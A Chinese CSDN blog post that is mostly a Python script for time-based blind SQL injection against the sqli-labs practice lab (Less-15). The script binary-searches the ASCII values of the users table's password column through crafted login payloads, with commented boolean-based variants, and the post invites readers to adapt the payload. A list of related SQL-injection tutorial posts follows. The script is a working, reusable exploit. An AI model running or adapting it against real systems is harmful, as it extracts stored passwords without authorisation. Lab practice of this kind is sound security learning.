sqli中盲注使用python脚本快速爆破

最新推荐文章于 2023-11-06 21:54:42 发布
最新推荐文章于 2023-11-06 21:54:42 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 渗透测试工具 文章标签: web安全 网络安全 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzheng126/article/details/123527386
版权 
#!/usr/bin/python3
# coding: utf-8
import requests

url = "http://10.10.1.71/Less-15/"
password_data = ""
ascii_list = range(32, 128)
j = 0
num = 0
# str1 = "You are in"
# str2 = "You have an error in your SQL syntax"

while(True):
    j += 1
    arr = ascii_list
    start = 0
    end = len(arr)

    while(start < end):
        num += 1
        mid = (start + end)//2
        k = arr[mid]

        payload = "admin' and if((select ord(substr(group_concat(password),%s,1)) from users)>%s,sleep(0.1),1)-- " % (j, k)
        data = {'uname': payload, 'passwd': 'aaa', 'submit': 'Submit'}
        response = requests.post(url, data=data)
        response.encoding = 'utf-8'

        # 基于页面内容不同,blind injection for boolian based
        # page_Content = response.text
        # if str1 in page_Content:

        # 基于响应header中content-length不同,blind injection for boolian based
        # page_byte = response.headers['Content-Length']
        # if int(page_byte) < 452:

        # 基于页面延迟时间不同,blind injection for time based
        page_time = response.elapsed.total_seconds()
        if page_time > 0.1:
            if end - start == 1:
                now_word = chr(arr[end])
                password_data += now_word
                break
            else:
                start = mid
        else:
            end = mid
            now_word = ""
    if now_word == "":
        break
    print(num, '___', password_data)
print('password_data:', password_data)

sqli中盲注使用python脚本快速爆破

payload可以根据需要进行修改

网络安全进阶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-lab简单python实现通关
Williu的博客
01-04 3345
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有关系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 991
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 无数据库 ‘cms’ ,需要将 phpstudy 的 cms 数据库导入 xampp 的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面有布尔类型的状态,可以根据布尔类型状态,对数据库的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
Python安全之编写SQL注入漏洞利用脚本(EXP)
weixin_43853965的博客
07-08 2350
背景: 最近护网在一次渗透测试过程发现了一处SQL盲注,在SQLMAP上跑了下居然没跑出结果,原因不明也没过多分析。于是自己写了个简单脚本作为测试。最终执行效果如下: 代码比较简单,值得一提的是怎么判断库名所有字符已经结束了,我用的是计数器。计数器num每次遍历+1;计数器a每次查找成功+1。当查找未空时说明a就不再加,导致num>a。也就是说当num和a不相等时,说明库名所有字符查找完了,此时break并输出整个库名。 代码: #!/usr/bin/env python # -*- coding:
SQL时间盲注python脚本
来到了学渣的博客
03-28 4721
环境 Sql-lib靶机 Python3.8 Request、time库 分析 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22--+ 无触发,用时182毫秒 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22%20and%20sleep(3)%20--+ 用时3.14秒 ...
sql盲注python脚本
weixin_48266255的博客
08-29 449
【代码】sql盲注python脚本
布尔盲注python脚本
04-22
.py文件,python脚本实现布尔盲注,输入网址实现自动化注入,信息包括数据库名、表名、字段以及字段数据。 代码示例靶场:sqli_labs第八关实测可行 注意事项:python3.8,就用了一个requests第三方库,单线程实现...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
albatar:Albatar是PythonSQLi开发框架
05-25
Albatar是Python的框架。 结果,您需要编写一些Python代码才能利用SQLI。 然后,只需传递类似sqlmap的命令行选项(例如--dbs,-banner等)来调用脚本即可从数据库检索数据。 目前,Altartar通过联合,错误,...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
SQL盲注python脚本爆破sqlmap基础操作
wangringyi的博客
04-09 6133
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、SQL盲注是什么? 二、介绍与使用 1.盲注的三种分类 2.基于报错的盲注 3.基于时间的脚本盲注 sqlmap的使用 前言 哈,我是爱挖洞的萝卜头,从今天开始来csdn分享学习过过程,学习经历,望各位大佬指教指教,嘿嘿嘿。 一、SQL盲注是什么? 经历过前面的数字型注入,字符型注入,提交方式注入等,我们对sql注入有了基本的...
Python黑客攻防(五)sqli-labs环境搭建
qq_43681532的博客
07-16 433
准备 phpstudy: phpStudy是一个PHP调试环境的程序集成包。该程序包集成许多的环境,一次性即可安装,无须配置即可使用,是非常方便、好用的PHP调试环境。 链接:https://wwe.lanzous.com/b01bjh6di 密码: hp2i sqli-labs: Sqli-labs是一个印度程序员写的,用来学习练习sql注入的一个注入靶场。 链接:https://wwe.lanzous.com/b01bji8yh 密码:f3xj 步骤 1.phpstudy安装完成后,把PHP版本改为
python3常用mysql库,Python3操作MySQL数据库
weixin_39744240的博客
03-25 162
一.安装PyMySQLcmdpip install pymysql查看pymysql安装是否成功pip show pymysql安装pymysql二.创建MySQL表CREATE TABLE 'users'{'id' INT(11) NOT NULL AUTO_INCREMENT, //id值,非空,递增'email' VARCHAR(255) COLLATE utf8_bin NOT NUL...
sqli-labs Less-8 Blind-- Boolian Based基于布尔的盲注
bigblue00的博客
06-16 404
Less-8 Blind-- Boolian Based基于布尔的盲注 1、回显分析 当输入的语句正确时,显示 You are in… 当输入的语句异常时,不显示任何信息 2、SQL盲注 根据页面的显示情况会有不同,可以构造判断语句,当语句成立时,显示You are in… 当语句不成立时,不显示任何信息。 先判断数据库名的长度: http://192.168.195.110/sqli-labs/Less-8/?id=1’and (length(database())>10) – + 页面无信息显示,
sqli-labs练习(八)------GET-Blind-Boolian Based-Sing Quotes
wkend的博客
04-26 543
输入1,回显You are in........... 输入1',没有回显 sql基于布尔的盲注 相关函数 函数 作用 length(str) 返回字符串str的长度 substr(str, pos, len) 将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始 mid(s...
SQL injection-Boolian Based
weixin_46601529的博客
09-23 98
猜解数据库长度 url?id=1' and length(database())>10 %23 #length() 获取字符串长度 2.猜解数据库名 url?id=1 and ascii(substr(database(),1,1))>96 %23 #ascii码 #substr(string,start,length) 48-57 0-9 65-90 A-Z 97-122 a-z 3.编写脚本刷出数据库名 security import requests .
sqli-labs less8 Get -Blind -Boolian based -Single quotes
Monster1m的博客
01-02 201
一、输入id,页面正常 http://127.0.0.1/sqli-labs-master/Less-8/?id=1 二、判断闭合方式以及注入方式 1.添加单引号,显示错误页面且无报错信息 http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 2.添加注释符,页面正常显示,则闭合方式为单引号 http://127.0.0.1/sqli-labs-master/Less-8/?id=1'--+ 3.由于没显示错误信息,所以选择盲注,这关提示用布尔盲注 三、判断
SQL注入练习平台sqli-labs
热门推荐
海枫的专栏
11-04 1万+
你是否在学习SQL注入找不到好的OJ平台,这里介绍sqli-labs项目给你,非常适合SQL注入初学者来这里升级怪兽。
sqli-lab平台注入练习 八,九,十
chuxuezheerer的博客
10-06 175
今天的内容主要都是回顾第五次练习里的内容。虽然没过几天,突然发现自己要注入还需要回顾前面的… Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注) 首先进行常规测试,发现单引号不能正常回显,双引号可以使页面正常回显,所以判断要用布尔型的盲注了吧。 之后同第五关,利用布尔型进行注入,再复习一下吧 猜测数据库名字的长度: h...
sqlilabs16python脚本
最新发布
04-13
SQLi Labs是一个用于学习和实践SQL注入的开源项目,其包含了一系列的漏洞场景和相应的解决方案。...请注意,在进行任何安全测试或攻击活动时,请确保已经获得了合法的授权,并且仅在合法的环境使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全进阶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值